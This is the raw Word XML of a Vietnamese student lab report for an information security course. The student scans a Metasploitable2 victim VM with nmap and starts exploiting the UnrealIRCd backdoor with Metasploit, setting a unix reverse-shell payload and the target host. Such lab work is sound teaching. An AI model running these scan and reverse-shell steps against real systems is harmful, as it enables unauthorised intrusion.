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4A8A0" w14:textId="56FB20F6" w:rsidR="00C5781C" w:rsidRPr="0048447B" w:rsidRDefault="00A8227A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bookmarkStart w:id="0" w:name="_Hlk114927756"/>
      <w:bookmarkStart w:id="1" w:name="_Hlk115031871"/>
      <w:r w:rsidRPr="0048447B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Báo cáo th</w:t>
      </w:r>
      <w:r w:rsidR="002E2717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ự</w:t>
      </w:r>
      <w:r w:rsidRPr="0048447B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c hành môn Cơ sở an toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5B57E" w14:textId="05B708AE" w:rsidR="00E020DA" w:rsidRDefault="00A8227A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8447B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài thực hành 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D4A5FE" w14:textId="5235B548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1786DD6" w14:textId="53C86482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9C4A193" w14:textId="17774FC8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573C7B27" w14:textId="464D7CA8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5B40BAE" w14:textId="0730D31A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71F4B75" w14:textId="069EBE7E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0AE2BBD" w14:textId="77777777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CF974B0" w14:textId="45609DF8" w:rsidR="00876CE9" w:rsidRDefault="00876CE9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Họ và tên: Hoàng Trung Kiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26991A32" w14:textId="4298146C" w:rsidR="00876CE9" w:rsidRDefault="00876CE9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Mã sinh viên: B20DCAT098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031A9BF" w14:textId="4E0A7E43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39AB6B2" w14:textId="4FD8D05C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BBE3EE0" w14:textId="4C5E2356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527E8397" w14:textId="1159C1FC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B73AC3A" w14:textId="3D4F0136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AEE4DC9" w14:textId="12E05A10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3EBDCE5" w14:textId="6DA5A3B1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685BFD4" w14:textId="72F4412F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F75A0F0" w14:textId="1085B302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4311FB3" w14:textId="7F1C51CA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C7A9FB4" w14:textId="590ED1BC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D701515" w14:textId="62D82FD5" w:rsidR="002E2717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AAFD958" w14:textId="77777777" w:rsidR="002E2717" w:rsidRPr="0048447B" w:rsidRDefault="002E2717" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426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bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7439501F" w14:textId="09DD0CA3" w:rsidR="00B63EAE" w:rsidRPr="00B63EAE" w:rsidRDefault="00B63EAE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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B63EAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt các công cụ, nền tảng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7C366" w14:textId="77777777" w:rsidR="00B63EAE" w:rsidRPr="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63EAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-Đổi tên hostname: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCAAB57" w14:textId="2FAFBAFF" w:rsidR="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63EAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+Máy attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A59D9C" w14:textId="2B4A4241" w:rsidR="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE">
      <w:pPr>
        <w:ind w:left="-426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3D7C6D3D" wp14:editId="68374476">
            <wp:extent cx="5731510" cy="896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73DB" w14:textId="59C342A8" w:rsidR="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE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+Máy victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0FF73" w14:textId="432E8857" w:rsidR="00B63EAE" w:rsidRPr="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE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314E37" wp14:editId="4C498133">
            <wp:extent cx="5731510" cy="9759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6C5B" w14:textId="77777777" w:rsidR="00B63EAE" w:rsidRPr="00B63EAE" w:rsidRDefault="00B63EAE" w:rsidP="00B63EAE">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF96C91" w14:textId="0CD3B5E7" w:rsidR="0099268F" w:rsidRDefault="00B63EAE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2.</w:t>
      </w:r>
      <w:r w:rsidR="001747E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E020DA" w:rsidRPr="00E020DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="002E2717" w:rsidRPr="00E020DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="002E2717" w:rsidRPr="00E020DA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E020DA" w:rsidRPr="00E020DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy Kali</w:t>
      </w:r>
      <w:r w:rsidR="0048447B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4552D08C" w14:textId="5DA3716C" w:rsidR="0099268F" w:rsidRPr="00E020DA" w:rsidRDefault="0099268F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Địa chỉ ip máy </w:t>
      </w:r>
      <w:r w:rsidR="00B63EAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttacker: 192.168.174.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8F953" w14:textId="63F3BB78" w:rsidR="00E020DA" w:rsidRDefault="00E020DA" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/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noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186BDC30" wp14:editId="7CEADEFF">
            <wp:extent cx="5730240" cy="19431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761E" w14:textId="25BB810D" w:rsidR="000A7804" w:rsidRDefault="00B63EAE" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr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3</w:t>
      </w:r>
      <w:r w:rsidR="001747E6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="00E020DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidR="00E020DA" w:rsidRPr="00E020DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ịa chỉ IP máy Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="00AF0EF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAAF19F" w14:textId="1F9F5450" w:rsidR="0099268F" w:rsidRPr="0099268F" w:rsidRDefault="0099268F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 w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ ip máy Victim: </w:t>
      </w:r>
      <w:r w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.174.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D0FAC" w14:textId="4428E7BC" w:rsidR="000A7804" w:rsidRDefault="002E599F" w:rsidP="002E2717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2F9EC78" wp14:editId="4A80C2FB">
            <wp:extent cx="5715000" cy="1851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66" b="44266"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57150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75DEC" w14:textId="6D2C02E8" w:rsidR="000A7804" w:rsidRDefault="00B63EAE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4</w:t>
      </w:r>
      <w:r w:rsidR="001747E6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="000A7804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0A7804" w:rsidRPr="000A7804">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ác máy ping nhau</w:t>
      </w:r>
      <w:r w:rsidR="001747E6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308D9F18" w14:textId="74DF4BF6" w:rsidR="00AF0EF6" w:rsidRDefault="00AF0EF6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-Máy victim ping đến máy attack</w:t>
      </w:r>
      <w:r w:rsidR="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF57C62" w14:textId="5A527AC8" w:rsidR="000A7804" w:rsidRDefault="001B0AA0" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr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+</w:t>
      </w:r>
      <w:r w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra kết nối từ máy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">victim </w:t>
      </w:r>
      <w:r w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">máy attacker: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B0AA0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ping (victim -&gt; attacker)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy victim tới máy attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="001B0AA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAEA17E" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="00CD0982" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DC3234" w14:textId="696563B8" w:rsidR="00CD0982" w:rsidRPr="00CD0982" w:rsidRDefault="00CD0982" w:rsidP="00CD0982">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6E328D" wp14:editId="696F2EDA">
            <wp:extent cx="5731510" cy="17653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C472" w14:textId="6351A939" w:rsidR="00250331" w:rsidRDefault="00AF0EF6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-Máy </w:t>
      </w:r>
      <w:r w:rsidR="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker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ping đến máy victim</w:t>
      </w:r>
      <w:r w:rsidR="00250331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</w:p>
    <w:p w14:paraId="20D43638" w14:textId="7372B9E5" w:rsidR="000A7804" w:rsidRDefault="001B0AA0" w:rsidP="00CD0982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+</w:t>
      </w:r>
      <w:r w:rsidR="0099268F" w:rsidRPr="0099268F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kiểm tra kết nối từ máy attacker đến máy victim: ping (attacker -&gt; victim)—--&gt; 0% packet loss —---&gt; có thể kết nối từ máy attacker tới máy victim</w:t>
      </w:r>
      <w:r w:rsidR="00CD098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CD0982">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4347C73F" wp14:editId="4E66D6FD">
            <wp:extent cx="5731510" cy="21717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C048860" w14:textId="3F763F22" w:rsidR="0048447B" w:rsidRDefault="0048447B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3660C575" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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652FB7D5" w14:textId="1781DC0A" w:rsidR="00BB3FD9" w:rsidRDefault="00B63EAE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5.</w:t>
      </w:r>
      <w:r w:rsidR="001747E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48447B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="0048447B" w:rsidRPr="0048447B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uét các cổng và dịch vụ máy đích (các đoạn có chứa dịch vụ vsftp và UnrealIRCd)</w:t>
      </w:r>
      <w:r w:rsidR="00BB3FD9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2B4E2E1C" w14:textId="21010C51" w:rsidR="00BB3FD9" w:rsidRDefault="00BB3FD9" w:rsidP="002E2717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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Quét các cổng, dịch vụ đang mở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bằng</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sV -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40425212" w14:textId="77777777" w:rsidR="002E2717" w:rsidRPr="0048447B" w:rsidRDefault="002E2717" w:rsidP="002E2717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05384E77" w14:textId="4B5363CA" w:rsidR="00AF0EF6" w:rsidRDefault="0048447B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CD5DDA" wp14:editId="1E007426">
            <wp:extent cx="6418119" cy="38938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0340" cy="38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21C2" w14:textId="73A40676" w:rsidR="002E2717" w:rsidRDefault="002E2717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7698C7C9" w14:textId="77777777" w:rsidR="002E2717" w:rsidRDefault="002E2717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5394B7EA" w14:textId="468E8982" w:rsidR="00BB3FD9" w:rsidRDefault="00BB3FD9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CF6567" wp14:editId="05110E89">
            <wp:extent cx="6446520" cy="371392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115" cy="37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0F6C" w14:textId="18E2A237" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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140D404F" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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683D3436" w14:textId="5B68E2FA" w:rsidR="00BB3FD9" w:rsidRDefault="00BB3FD9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03C1C0" wp14:editId="770D4EA9">
            <wp:extent cx="6387048" cy="3421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3666" cy="34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0997" w14:textId="104FEF94" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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65A6AED8" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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3D1236FF" w14:textId="56ABF19D" w:rsidR="00BB3FD9" w:rsidRDefault="00BB3FD9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BB3FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Quét các lỗ hổng: nmap -sC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA9F11" w14:textId="5C73C676" w:rsidR="00087AA1" w:rsidRDefault="00087AA1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366E88" wp14:editId="5783201C">
            <wp:extent cx="6469380" cy="408332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82" cy="40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731C" w14:textId="486F8924" w:rsidR="00087AA1" w:rsidRDefault="00087AA1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D4F9A7" wp14:editId="291FCDD4">
            <wp:extent cx="6499860" cy="38526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9290" cy="38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F72D" w14:textId="12D37608" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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5563CDF9" w14:textId="70E1A4B8" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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1B7909D4" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="00CD0982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4F84511D" w14:textId="7865489E" w:rsidR="00087AA1" w:rsidRDefault="00087AA1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89EA69" wp14:editId="6C846AAC">
            <wp:extent cx="6538932" cy="3131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4326" cy="314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C02B" w14:textId="6B9C2BAD" w:rsidR="001B0AA0" w:rsidRDefault="001B0AA0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0A9AFD19" w14:textId="5E357203" w:rsidR="001B0AA0" w:rsidRDefault="001B0AA0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4363D101" w14:textId="77777777" w:rsidR="002E2717" w:rsidRDefault="002E2717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5F229D66" w14:textId="05B78F73" w:rsidR="004A2826" w:rsidRDefault="00B63EAE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6.</w:t>
      </w:r>
      <w:r w:rsidR="001747E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1747E6" w:rsidRPr="001747E6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khai thác cửa hậu trên UnrealIRCd</w:t>
      </w:r>
      <w:r w:rsidR="004A2826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46D7CC8F" w14:textId="1338BFDE" w:rsidR="001B0AA0" w:rsidRPr="004A2826" w:rsidRDefault="001B0AA0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 w:rsidRPr="004A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Theo như kết quả quét từ nmap , máy victim đang chạy dịch vụ UnrealIRCd </w:t>
      </w:r>
      <w:r w:rsidR="004A2826" w:rsidRPr="004A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidR="004A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cổng 6667:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF790E9" w14:textId="067412F8" w:rsidR="001B0AA0" w:rsidRDefault="001B0AA0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BD9F28" wp14:editId="3665B648">
            <wp:extent cx="6486079" cy="769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6102" cy="7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65C6" w14:textId="2280AC4F" w:rsidR="004A2826" w:rsidRDefault="004A2826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4A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Tiến hành xác định lỗ hổng bảo mật của dịch UnrealIRCd đang chạy trên máy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4A2826">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>victim —--&gt; lỗ hổng bảo mật : UnrealIRCD Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F0520" w14:textId="7972A39B" w:rsidR="004A2826" w:rsidRDefault="004A2826" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/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49A343D" wp14:editId="0809C260">
            <wp:extent cx="6591237" cy="12268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5644" cy="12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5D22" w14:textId="4A6AE3A3" w:rsidR="004A2826" w:rsidRPr="00CD0982" w:rsidRDefault="004A2826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CD0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Tìm kiếm và set payload cho module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABB0A5" w14:textId="6AEB25EA" w:rsidR="004A2826" w:rsidRDefault="009F6BB0" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/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C316884" wp14:editId="4A95ABC3">
            <wp:extent cx="6628936" cy="21717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6764" cy="21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6630" w14:textId="3673E6A6" w:rsidR="009F6BB0" w:rsidRPr="009F6BB0" w:rsidRDefault="009F6BB0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 w:rsidRPr="009F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Lệnh đã sử dụng: show payloads —--&gt; payload phù hợp : payload/cmd/unix/reverse </w:t>
      </w:r>
      <w:r w:rsidR="00CD0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set payload payload/cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B710F43" w14:textId="3AB08F92" w:rsidR="000959A0" w:rsidRDefault="000959A0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288F63B9" w14:textId="77777777" w:rsidR="009F6BB0" w:rsidRDefault="009F6BB0" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616CE267" w14:textId="413654FB" w:rsidR="00BB3FD9" w:rsidRDefault="009F6BB0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E14A35" wp14:editId="72EB1FF8">
            <wp:extent cx="6332220" cy="2883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11616" r="22"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6344733" cy="288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FA82" w14:textId="77777777" w:rsidR="009F6BB0" w:rsidRPr="009F6BB0" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626ADCD2" w14:textId="68762B22" w:rsidR="009F6BB0" w:rsidRPr="009F6BB0" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+)set RHOSTS 192.168.174.129 —&gt; đặt giá trị cho tham số là địa chỉ ip của máy victim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C8C98" w14:textId="0140DB6F" w:rsidR="009F6BB0" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
